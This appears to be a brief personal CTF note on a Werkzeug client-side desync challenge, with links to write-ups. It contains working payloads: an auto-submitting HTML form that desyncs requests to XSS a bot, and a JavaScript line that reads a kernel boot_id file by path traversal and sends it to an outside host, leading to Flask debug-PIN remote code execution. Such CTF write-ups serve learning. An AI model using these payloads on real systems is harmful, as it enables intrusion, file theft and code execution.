Skip to content

Dimas Maulana
Categories
CTF

Client Side Desync Attack

https://mizu.re/post/abusing-client-side-desync-on-werkzeughttps://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/now-you-c-me

Created

Updated

1 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

CVE Wergzeug 2.0.1 & 2.1.1

https://mizu.re/post/abusing-client-side-desync-on-werkzeug

Desynth Recruit - web

  • Open Redirect => http://127.0.0.1:1337/go?to=//webhook.site
  • Client Side Desync to XSS the bot https://mizu.re/post/abusing-client-side-desync-on-werkzeug
    • <form id="x" action="http://127.0.0.1:1337/" method="POST" enctype="text/plain"><textarea name="GET http://xpl.xanhacks.xyz:4444 HTTP/1.1Foo: x">Mizu</textarea><button type="submit">CLICK ME</button></form><script>x.submit()
</script>
  • Read and exiltrate file used for generate Flask debug pin, ex:
    • var request = new XMLHttpRequest();request.open('GET', '/api/ipc_download?file=../../../../../proc/sys/kernel/random/boot_id', false);request.send();var flag = request.responseText;window.location.href = "http://xpl.xanhacks.xyz:4444?flag=" + flag;
  • Generate PIN + RCE via /console

    • SEETF Client side desync attack

    https://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/now-you-c-me

    Categories & Topics

    This note is categorized under the following topics. Click on any category to explore more related content.

    CTF

    Share this note

    Share:

    Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

    Categories

    CTF